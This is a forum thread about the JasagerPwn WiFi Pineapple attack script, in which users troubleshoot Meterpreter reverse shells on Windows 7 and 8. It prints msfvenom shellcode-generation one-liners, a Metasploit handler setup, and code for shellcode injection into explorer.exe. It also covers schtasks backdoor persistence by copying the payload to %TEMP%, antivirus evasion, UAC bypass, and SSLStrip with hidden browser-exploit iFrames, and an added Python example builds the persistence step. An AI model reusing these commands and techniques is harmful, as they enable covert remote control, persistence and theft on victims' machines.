[Script] JasagerPwn 2.0 - Reborn


leg3nd


Uhm, is there a way to make it work as a simple Python file, without compiling it to an .exe with py2exe? I tried executing inject.py, but it kills explorer.exe almost instantly :/

Of course. You should be able to execute the python script directly.

explorer.exe will crash if you do not have a listener waiting for the connection; since the connection is refused, the script will hit an exception.

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 0.0.0.0
set LPORT 587
set ExitOnSession false
set EXITFUNC thread
set AutoRunScript "migrate -f"
exploit -j
Edited by leg3nd

Weird... I generated the payload, changing the IP address and port to my liking (both VMs are on the same LAN, bridged to my network), copied the payload into inject.py, launched it, and nothing; Metasploit shows no sessions :/ I even tried compiling with py2exe (oh, by the way, the resulting .exe doesn't have the .ico embedded in it after the process, minor problem).


Interesting... if you wanna hop on IRC, I can look into it more.

I assume you're using the command in the top comment of the script to generate it?


Update: I have created an infusion for the MK5 called Strip-N-Inject which combines the SSLStrip attack with code injection, all in the same infusion. It is extremely successful and efficient and will provide the code-injection capabilities for any injection-based attack vector. It will be available in your Pineapple Bar soon, so you can use all the features of this script.

Note: Please run "./jasagerPwn -u" before testing anything, as I have added some updates for this change.

Thank you for your patience!

Edited by leg3nd

Sorry, it was kinda late (3 AM here), and I went to bed :P

The steps I did for now are:

data=$(msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.249.128 LPORT=587 -f c | tr -d '\"' | tr -d '\n' | awk -F= '{print $2}' | awk '{print $1}') ; python -c 'import base64;print base64.encodestring("'$data'").replace("\n","")'

Generated the payload for my IP.

Copied it into inject.py, replacing the code1 variable.

Installed Python 2.7.5 on the Windows victim machine.

Started the listener on the attacker machine.

Launched inject.py from the victim machine.

But I get no shell on the listener...

I'm using Windows 7 64-bit on the victim machine and a fresh Kali Linux install as the attacker machine.

EDIT: found the problem. The payload works only on Windows 7 32-bit, not 64-bit :/ Any clue?

Edited by wolfdale

Hmmm... yes, I understand the issue here. The problem is that injecting 32-bit shellcode into a 64-bit process will fail (explorer.exe is 64-bit).

There are 2 potential solutions here:

  1. Choose a 32-bit process: Even though the machine is 64-bit, it should work with a 32-bit process.
    1. Look in Task Manager for a process with *32 on the end of it and try using that process instead. The problem here is that most default processes on a 64-bit system will be 64-bit.
  2. Use 64-bit shellcode: You can modify that command a bit to generate 64-bit shellcode.
data=$(msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.249.128 LPORT=587 -f c | tr -d '\"' | tr -d '\n' | awk -F= '{print $2}' | awk '{print $1}') ; python -c 'import base64;print base64.encodestring("'$data'").replace("\n","")'

This will work for your testing purposes and for exploiting a targeted architecture, but this is a crappy solution at the end of the day since it's not architecture agnostic. I'll come up with a fool-proof solution this weekend... just need to brainstorm a bit.


Just a quick question....

As the script progresses and new MK5 infusions get written for it, will they be back-ported to the MK4? And if not, is there going to be a point where the script doesn't play nice with the MK4 anymore?

Just curious :)

Thanks again!

Edited by Fira

I won't be officially supporting the MK4.

Currently, some of the attacks will work, such as Fake Update and Java Applet Redirect; however, there is no "Strip-N-Inject" infusion for the MK4, so none of those attacks will work. When I'm doing future development for JasagerPwn it will be targeted at the MK5 and won't have much consideration for backwards compatibility with the MK4.


All right, thanks a lot!!

I have one more question: Is there a way to make the inject.py code persistent? At the moment the SCHTASKS task just starts a Python window but doesn't execute inject.py.

The cause is probably this line -> exe_loc = str(sys.executable), which points to the Python executable (python.exe) at the moment. I'm guessing that when inject.py is compiled to an .exe this method would return the path to the .exe (which makes more sense :P). Since I'm using it in a non-conventional way (as a .py), this doesn't work.

I modified it this way -> exe_loc = str("C:\Users\myusername\Desktop\inject.py")

Is there a way to copy inject.py somewhere (I'm thinking the Documents folder or something) so that even if someone deletes the .py and reboots I don't lose the shell?

Again, thanks for your help, much appreciated :)


Yeah, currently it will think python.exe is the current executable... which technically it is, since you're running it through the interpreter.

This was designed to be run as an EXE, for obvious reasons, in which case that line is fine.

However, if you insist on using the interpreter, your change will work:

exe_loc = "C:\Users\myusername\Desktop\inject.py"

Yup, but it's not really persistent, because if someone deletes the .py (or even the .exe, for that matter), the backdoor won't start again. I was asking if there is a way to move inject.py somewhere safe (i.e. the Documents folder) without triggering antivirus :P

Thanks for your patience :PP


The script can copy the current executable to the temporary directory under some name like WRE8285.exe and then use THAT as the schtasks backdoor.

I currently have that implemented in the powershell-https payload; here is the relevant code:

import os
import subprocess
import sys

exe_loc = str(sys.executable)  # the running .exe when compiled; python.exe under the interpreter
backdoor_loc = os.getenv('TEMP') + '\\' + "WRE8284.exe"
# copy the current executable into %TEMP%; the paths are quoted so a space in either one does not split the command
proc = subprocess.Popen('copy /y "%s" "%s"' % (exe_loc, backdoor_loc), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)

Then in the XML file I'm generating, replace this:

....." + exe_loc + ".....

with this:

....." + backdoor_loc + "..... 

This is the file you can reference that already does this (I'll add this to inject.py with other improvements later on): https://code.google.com/p/jasagerpwn-reborn/source/browse/trunk/resources/meterpreter_powershell-HTTPS/powershell-https.py

A cleartext Python script will always have a chance of triggering AV. Compiling it will help a lot with that.

Edited by leg3nd
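The post above points at the fix for the persistence problem (copy the running file to %TEMP% and register that copy instead of python.exe). The following is an added example written for this thread, not JasagerPwn code and not taken from powershell-https.py: it resolves which file has to be re-launched whether the script runs as a .py or as a py2exe .exe, copies it into %TEMP% under a new name without going through cmd.exe, and builds the schtasks argv that would register it. The function names, the task name and the WRE8284 basename are assumptions; nothing in it runs schtasks on its own.

```python
# Added example (not from JasagerPwn or powershell-https.py): pick the file
# that has to be re-launched for persistence whether the script runs as a .py
# or as a py2exe .exe, copy it under a new name into %TEMP%, and build the
# schtasks argv that registers it. Names such as stage_copy and the task name
# are assumptions; nothing here runs schtasks by itself.
import os
import shutil
import sys
import tempfile


def current_executable():
    """py2exe (and PyInstaller) set sys.frozen, and then sys.executable is the
    packaged .exe. Under the plain interpreter sys.executable is python.exe,
    so the thing to re-run is the script file itself (the problem inject.py's
    str(sys.executable) line has when it is run as a .py)."""
    if getattr(sys, "frozen", False):
        return os.path.abspath(sys.executable)
    return os.path.abspath(sys.argv[0])


def stage_copy(src, dest_dir=None, basename="WRE8284"):
    """Copy src into dest_dir (default %TEMP%) keeping its extension, so a .py
    stays a .py. shutil.copy2 replaces `copy /y` through a shell: no quoting
    problems with spaces in paths and no console window."""
    if dest_dir is None:
        dest_dir = os.getenv("TEMP") or tempfile.gettempdir()
    dest = os.path.join(dest_dir, basename + os.path.splitext(src)[1])
    shutil.copy2(src, dest)
    return dest


def schtasks_command(task_name, target):
    """argv for `schtasks /create ... /sc onlogon`. A .py has to be launched
    through the interpreter installed on the target; an .exe runs directly.
    Run it with subprocess.call(cmd); no shell=True is needed."""
    if target.lower().endswith(".py"):
        action = '"%s" "%s"' % (sys.executable, target)
    else:
        action = '"%s"' % target
    return ["schtasks", "/create", "/f", "/sc", "onlogon",
            "/tn", task_name, "/tr", action]


def stage_demo():
    """Self-contained check: write a throwaway script (constructed input),
    stage it into a fresh temp directory and report what would be registered."""
    work = tempfile.mkdtemp()
    src = os.path.join(work, "inject.py")
    with open(src, "w") as f:
        f.write("print('hello')\n")
    dest = stage_copy(src, dest_dir=work)
    with open(src) as a, open(dest) as b:
        same = a.read() == b.read()
    return {"dest": dest, "copied": same and os.path.exists(dest),
            "cmd": schtasks_command("UpdaterDemo", dest)}


if __name__ == "__main__":
    print(current_executable())
    print(stage_demo())
```

Deleting the original .py or .exe no longer matters once the staged copy is what the task points at; the remaining gap, as the thread notes, is that a cleartext .py in %TEMP% is just as visible to AV as it was on the Desktop.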

Woot, that was quick, thanks.

I'm still trying to figure out why the x64 payload doesn't work on Windows 7 x64, though.

I generated the payload as per your instructions and copied it into the code1 variable. Still no shell. The payload is twice as long as a 32-bit payload; maybe there is a problem with memory allocation?


Not sure off the top of my head... I'll do some playing with it this weekend and check if it's a memory manipulation issue. I've never tested this with 64-bit shellcode, so it could be problematic.

I generated both 32-bit and 64-bit shellcode with your address. The 32-bit is 389 characters and the 64-bit is 565 characters.

Here is the shellcode I generated (with your IPs): http://paste.pound-python.org/show/McfvJRisjSZYcjbYVfm0/

If this doesn't work, just keep poking at it or wait until I release a new version this weekend.

Edited by leg3nd

I doubt it's a problem with the shellcode, but I'll give it a try now.

If I can't solve it messing around, I'll wait for your update :P I'll let you know if I find out something.

Thanks again, I owe you one!

Updated. I changed out the process injection for simpler direct shellcode execution. This will work on both 32- and 64-bit Windows 7 and is much more stable since it doesn't touch external memory or process space.

If you want to migrate, you can just use Metasploit for that. I believe they have a new "set PrependMigrate true" option, or AutoRunScript "migrate -f -k".

Let me know how this one works for you.

EDIT: On an unrelated note, I just added a Metasploit BrowserPwn invisible iFrame injection attack. This will allow the victim to browse normally while they are sslstripped and have exploits injected into the browser in the background.

Edited by leg3nd

It works GREAT, both on Windows 7 32- and 64-bit. Should work on W8 too, right? I'll try it later.

Now, I need to include this in a Python script which will be run with the 64-bit version of Python on Windows 7. In this case it doesn't work. It works only if the 32-bit version of Python is installed. I printed the exception; it's a memory access violation.

Obviously the cause is this function here:

def run_sc(shellcode):

I'm poking around looking for a solution; any input will be appreciated :)

If I may add a suggestion: now that the reverse shell is stable (damn, is it stable :P), you could add the .exe to Windows startup instead of adding a schtask. A lot of notepad.exe are going to look suspicious.

Now testing the payload on Windows 8. I'll let you know.

Edit: payload working fine on Windows 8.

Edited by wolfdale

Don't know that the exception matters; it's loading my meterpreters just fine.

Yes... this is using 32-bit shellcode and is compiled into a 32-bit binary that can be used on both 32/64-bit platforms. You'll need to change things if you want it to be purely 64-bit, but that will not work on 32-bit platforms... so I don't get what you're trying to do.

I also don't see much point in deploying this as a Python script, since 99% of people don't have Python installed.


I have a very specific target which uses 64-bit Python, so I wanted a Python script that could work with Python 2.7.5 64-bit.

I have never used the ctypes library, so I have no idea where to start.

Don't worry too much about it; you have helped me enough already :P I'll study the matter more when I have some time free from Uni.


I've got another question: is there a way to execute bypass_uac in memory as well?

It's theoretically possible. Any code that can be executed from disk can be turned into shellcode and executed in memory.

This is a known, working UAC bypass by Dave Kennedy: https://www.trustedsec.com/files/bypassuac.zip

It will need to be modified to run in memory.

Edited by leg3nd

Finally got bypass_uac working (although not in memory). Had to recompile it to avoid AV. This is fine by me for now.

Metasploit was insisting on uploading its unencrypted payload for the reverse shell when I was using the bypass_uac module. Used yours and obviously everything went fine and dandy.

I'm a happy man :D


  • 5 weeks later...

So I've been trying to install JasagerPwn on the latest firmware, and it doesn't look like it's going to work. I got it to install on Kali 1.05 OK, but I can't seem to get it from my Kali box to the Pineapple. I really like the whole concept/idea of JasagerPwn Reborn. It sounds so badass. Do you think that I could inject those same exploits/payloads mentioned in this post with "Strip-N-Inject"? Sorry for asking, but I'm at my wits' end here. I've been reading this post all night and still haven't had any luck. Anyway, please hit me up.
